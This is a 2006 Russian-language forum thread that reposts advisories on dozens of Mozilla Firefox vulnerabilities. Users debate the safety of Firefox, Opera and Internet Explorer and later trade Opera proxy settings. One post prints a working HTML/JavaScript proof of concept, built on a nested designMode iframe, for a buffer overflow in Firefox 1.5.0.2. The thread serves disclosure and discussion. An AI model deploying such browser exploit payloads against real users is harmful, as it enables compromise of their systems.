PDA

Просмотр полной версии : Множественные уязвимости в Mozilla Firefox


c411k
17.04.2006, 19:10
Программа:
Mozilla Firefox 1.5.0.1 и более ранние версии.
Mozilla Suit версии до 1.7.13

Опасность: Критическая

Наличие эксплоита: Нет

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, обойти ограничения безопасности, получить доступ к важным данным и скомпрометировать уязвимую систему.

1. Уязвимость существует из-за ошибки, которая позволяет внедрить JavaScript код в другую, в данный момент загружающуюся, страницу. Удаленный пользователь может с помощью специально сформированного Web сайта выполнить произвольный код сценария в браузере жертвы в контексте безопасности любо сайта.

2. Уязвимость существует из-за ошибки в garbage collection в JavaScript. Удаленный пользователь может вызвать повреждение памяти и выполнить произвольный код на целевой системе.

3. Ошибка при обработке входных данных в реализации каскадных стилей может позволить злоумышленнику дописать некоторые данные в конец массива.

4. Целочисленной переполнение буфера обнаружено при обработке слишком длинных регулярных выражений в JavaScript. Удаленный пользователь может выполнить произвольный JavaScript код на системе.

5. Обнаружено две ошибки при обработке "-moz-grid" и "-moz-grid-group" стилей. Удаленный пользователь может выполнить произвольный код на целевой системе.

6. Ошибка обнаружена в методе "InstallTrigger.install()". Удаленный пользователь может вызвать повреждение памяти на системе.

7. Уязвимость существует из-за неизвестной ошибки, которая позволяет в некоторых ситуациях подменить иконку с изображением безопасного замка и содержимое адресной строки путем изменения месторасположения pop-up окна. Для успешной эксплуатации уязвимости опция "Entering secure site" должна быть включена (По умолчанию отключена).

8. Уязвимость позволяет злоумышленнику обманом заставить пользователя скачать злонамеренный файл с помощью меню "Save image as...".

9. JavaScript функция, созданная вызовом "eval()" совместно с методом XBL привязки может быть скомпилирована с некорректными привилегиями. Удаленный пользователь может выполнить произвольный код на целевой системе.

10. Обнаружена ошибка в методе "Object.watch()", открывающем внутренний "clone parent" объект функции. Удаленный пользователь может выполнить произвольный JavaScript код на системе.

11. Обнаружена ошибка в способе зашиты сборки встроенных XBL связок. Удаленный пользователь может выполнить произвольный JavaScript сценарий на системе с повышенными привилегиями.

12. Неизвестная ошибка позволяет удаленному пользователю выполнить произвольный код сценария посредством массива window.controllers.

13. Уязвимость существует из-за ошибки при обработке определенной последовательности HTML тегов. Удаленный пользователь может вызвать повреждение памяти и выполнить произвольный код на целевой системе.

14. Уязвимость обнаружена в методах "valueOf.call()" и "valueOf.apply()". Удаленный пользователь может выполнить произвольный код сценария в браузере жертвы в контексте безопасности произвольного сайта.

15. Обнаружено несколько ошибок в реализации DHTML. Удаленный пользователь может вызвать повреждение памяти и выполнить произвольный код на целевой системе.

16. Целочисленное переполнение обнаружено при обработке CSS свойства letter-spacing. Удаленный пользователь может вызвать переполнение динамической памяти и выполнить произвольный код на целевой системе.

17. Уязвимость существует при обработке элементов формы для загрузки файлов. Удаленный пользователь может загрузить произвольные файлы с системы пользователя на сервер путем динамической подмены элемента текстовой строки на элемент загрузки файлов.

18. Неизвестная ошибка существует в методе "crypto.generateCRMFRequest()". Удаленный пользователь может выполнить произвольный код на целевой системе.

19. Ошибка при обработке сценариев в XBL элементах может позволить злоумышленнику получить chrome привилегии с помощью модуля "Print Preview".

20. Уязвимость существует из-за ошибки при проверке безопасности в методе "js_ValueToFunctionObject()". Удаленный пользователь может выполнить произвольный код с помощью "setTimeout()" и "ForEach".

21. Уязвимость существует из-за ошибки взаимодействия между содержимым XUL окна и механизмом “History”. Злоумышленник может обманом заставить пользователя взаимодействовать с невидимым пользовательским интерфейсом браузера.
http://www.securitylab.ru/vulnerability/265636.php

__________________
FF :eek:
все качаем 1.5.0.2 !

Utochka
17.04.2006, 19:48
Нифига себе! Прославился FireFox )

drmist
17.04.2006, 21:31
Все равно это лучший браузер
я вот уже достаточно давно апдейт 1.5.0.2 скачал ))

Utochka
17.04.2006, 23:38
Все равно это лучший браузер
я вот уже достаточно давно апдейт 1.5.0.2 скачал ))

Опера тоже рулит. А вот ишак ИМХО отстой!!

bxN5
17.04.2006, 23:46
Ну старенькие дырочки в файервоксе ети да и имхо как уже говорили опера рулез! Про ie я вообще молчу!

H0ak1N
18.04.2006, 00:12
чем больше лиса будет набирать популярность, тем больше будут находить багов.
безусловно врядли в ближайшем будущем кто-нибудь переплюнет ie

NeMiNeM
18.04.2006, 01:00
В Firefox по-умолчанию стоит авто-обновление и только последний дурак его отключает, так что эти все уязвимости не существенные. Например, уязвимости были найдены 14, а уже 15.04 вышло обновление 1.5.0.2.

H0ak1N
18.04.2006, 01:24
В Firefox по-умолчанию стоит авто-обновление.
в винде оно тоже стоит, однако результат малозначителен.

NeMiNeM
18.04.2006, 01:28
в винде оно тоже стоит, однако результат малозначителен.
Тут вообщето о браузерах говорят... Сравнил винду и Firefox...пфф..

H0ak1N
18.04.2006, 16:32
Сравнил винду и Firefox
я этого не говорил. я имел ввиду, что это автообновление не поможет массовому пользователю.
узявимости и на firefox есть, просто о них секлабы и прочие будут узнавать последними. После того, как на баге заработают.

GreenBear
18.04.2006, 16:50
а уже 15.04 вышло обновление 1.5.0.2.
оно вышло гараздо раньше.

KEZ
18.04.2006, 17:28
ни разу ещё firefox меня не подвел... обновление сразу слил и все. нету дыр. уже не один сплойт не работает. другое дело IE.. там работае все с 99 года ещё.. микрософт забыла сделать патчи

drmist
18.04.2006, 18:03
H0ak1N
ты забыл о том, что ie (вместе с виндой) - платный продукт.
поэтому его никто не обновляет - на крякнутом маздае народ сидит.
ff - фришный. потому апдейт получили сразу почти все юзеры.
просто выскачило окошко "Хотите обновить лису?" - "Да, хочу." - и баги уже не актуальны.
Есть такое в опере или ie?

Вобще зачем столько гемора с платными браузерами и осями, когда есть такая замечательная, безопасная и бесплатная фряха :P

Dronga
18.04.2006, 18:06
В опере есть. А вот превратить свой комп в рабочую станцию с установленной фряхой по-моему это из раздела извращений.

Azazel
18.04.2006, 18:16
Ghostчсюсь. Из-за неизвестных проблем.

H0ak1N
18.04.2006, 18:48
другое дело IE.. там работае все с 99 года ещё
При настройки activex и java даже старую версию осла не пробить ;) единственный минус будет отключена flash-анимация.


ты забыл о том, что ie (вместе с виндой) - платный продукт.
поэтому его никто не обновляет - на крякнутом маздае народ сидит.
я ничего не забывал. а ты видимо не знал, что обновление бесплатно.
ff - фришный. потому апдейт получили сразу почти все юзеры.такой же апдейт и в ie ;) просто в лисе обновление чаще и меньше весит а для ie выходит реже и больше весит.
и баги уже не актуальны
публичные браузерные эксплоиты всегда не актуальны. оч маленькая пробиваемость.

зы безусловно вцелом лиса самый безопасный браузер из существуших.

drmist
18.04.2006, 21:09
а ты видимо не знал, что обновление бесплатно
ты видимо забыл, что не все юзеры проходят онлайн-проверку серийников :)

NeMiNeM
19.04.2006, 00:54
а уже 15.04 вышло обновление 1.5.0.2.
оно вышло гараздо раньше.
Ну не на много раньше...
Release Date: April 13, 2006
Подумаеш, 2 дня ошибся=)
Это не важко, я имел ввиду, что обновления выходят быстро...

grinay
19.04.2006, 01:31
drmist,H0ak1N а кроме автообновления? ручками поработать не пробовали ну вроде как ссылки там понажимать и все такое?:)

KEZ
19.04.2006, 01:43
я ничего не забывал. а ты видимо не знал, что обновление бесплатно.

Обновление бесплатно, а браузер платный, т.к. Windows платная.


такой же апдейт и в ie просто в лисе обновление чаще и меньше весит а для ie выходит реже и больше весит.

Когда весь инет протроянят, тогда уже выходя для IE.. Ну а что, все равно уже троянить некого


При настройки activex и java даже старую версию осла не пробить единственный минус будет отключена flash-анимация.

Во-первых, не всегда.. Можно найти эксплойты, которые не зависили от activex.
И java тут тоже не при чем.

Мыслим глобальнее.. Сколько юзеров что-то настраивают в IE? Не более 1%.
Остальные пробиваемы, и их троянят

c411k
19.04.2006, 16:17
update:
Не успела выйти последняя версия популярного браузера Mozilla Firefox (1.5.0.2), как тут же сообщили о наличии уязвимости в этом браузере. Как указывается в описании, обычно Вэб-сайты не ссылаются на локальные (с точки зрения посетителя) ресурсы. Однако наличие уязвимости может позволить получить доступ к лоакльному файлу, открываемому в браузере, при помощи URI типа file:. Для этого необходимо заманить посетителя на специальным образом сформированную страницу и убедить при нажатии на правую кнопку мыши выбрать "View Image" на рисунке, который он не видит. Так как на настоящий момент патча не существует, рекомендуется не пользоваться этой "особенностью".
Опубликовано: 18.04.2006
http://www.fssr.ru/hz.php?name=News&file=article&sid=5896

:eek:

c411k
25.04.2006, 07:51
25 апреля, 2006
Программа: Mozilla Firefox 1.5.0.2, возможно более ранние версии.

Опасность: Критическая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.

Уязвимость существует при обработке JavaScript кода в библиотеках js320.dll и xpcom_core.dll. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение буфера и выполнит произвольный код на целевой системе. Пример:

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
<script>
var textarea = document.getElementsByName("x_OtherInfo");
textarea=textarea.item(0);
var htmlarea = document.createElement("div");
htmlarea.className = "htmlarea";
textarea.parentNode.insertBefore(htmlarea, textarea);
var iframe = document.createElement("iframe");
htmlarea.appendChild(iframe);
var doc = iframe.contentWindow.document;
doc.designMode = "on";
doc.open();
doc.write("<iframe src=''>");
iframe.contentWindow.focus()
doc.close();
</script>
</textarea>

http://www.securitylab.ru/vulnerability/266229.php

Macroeject
25.04.2006, 16:43
Ну старенькие дырочки в файервоксе ети да и имхо как уже говорили опера рулез! Про ie я вообще молчу!
в Operе я прокси немогу поставить,как не пытался уже...могеть подскажешь?

NeMiNeM
25.04.2006, 18:01
Macroeject

Tools-->Preferences-->Advanced-->Network-->Proxy Servers

Потом Tools-->Quick Preferences-->Enable Proxy Servers

bxN5
25.04.2006, 18:14
а терь по русски:) Инструменты-->Быстрая настройка-->Включить прокси сервера
Ввобщем качаеш прогу hide ip platinum запускаеш она находит проксик а потом делаеш выше сказаное и все=)

gLAnce
25.04.2006, 18:23
а теперь по французки:

Les instruments-> les Préférences-> Avancé-> le Réseau-> les Serveurs Par procuration Ïî ò î ì Les instruments-> les Préférences Rapides-> Permettent aux Serveurs Par procuration